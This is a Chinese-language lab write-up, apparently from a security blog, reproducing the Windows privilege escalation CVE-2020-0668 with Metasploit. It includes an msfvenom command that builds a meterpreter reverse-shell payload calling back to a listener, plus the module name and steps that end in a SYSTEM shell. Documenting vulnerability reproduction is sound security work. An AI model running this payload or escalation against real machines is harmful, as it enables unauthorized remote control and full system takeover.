CVE-2020-0668 Windows 本地提取漏洞

漏洞简介

Windows Service Tracing中的权限提升漏洞
发布时间 :2020-02-29
漏洞类型:Windows 权限提升
CVE编号:CVE-2020-0668
CNNVD-ID:CNNVD-202002-518

影响范围

• Windows 7
• Windows 8.1
• Windows RT 8.1
• Windows 10
• Windows Server 2008
• Windows Server 2008 R2
• Windows Server 2012
• Windows Server 2012 R2
• Windows Server 2016
• Windows Server 2019
• Windows 10版本1607
• Windows 10版本1709
• Windows 10版本1803
• Windows 10版本1809
• Windows 10版本1903
• Windows 10版本1909
• Windows Server版本1803
• Windows Server版本1903
• Windows Server版本1909

漏洞详情

Windows Service Tracing中的权限提升漏洞分析 CVE-2020-0668
https://www.freebuf.com/vuls/227557.html

漏洞复现

Metasploit 中已经更新该漏洞Exp - exploit/windows/local/cve_2020_0668_service_tracing

测试环境:

• Metasploit 6
• Windows10 (Build 18362)

一、生成Metasploit木马

这里有个小坑,生成时记得使用x64位Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.132 LPORT=6666 -f exe -o payload.exe
监听时记得也使用x64位Payload - windows/x64/meterpreter/reverse_tcp

二、执行木马上线Metasploit

创建一个普通用户,并登陆普通用户,运行木马上线。
19140-6eejx9va6zp.png
然后执行bg,放入后台

三、利用CVE_2020_0668进行提权

直接加载脚本
use exploit/windows/local/cve_2020_0668_service_tracing
配置脚本
46275-ms4fq4fl6q.png
配置完成再开一个Metasploit监听4444端口,配置和上述脚本同样的Payload。
运行提权脚本
10702-m5oaixu277.png
收到提权后的shell
47727-6ex4uyix44b.png
查看权限 - System
77116-29167cip33n.png
提权成功

修复建议

及时更新系统或更新补丁

本文作者:重生信安-山石

原创文章,作者:运营,如若转载,请注明出处:http://www.csxxaq.com/bug/1802.html
「翻译」 如何Bypass rbash
« 上一篇 10-12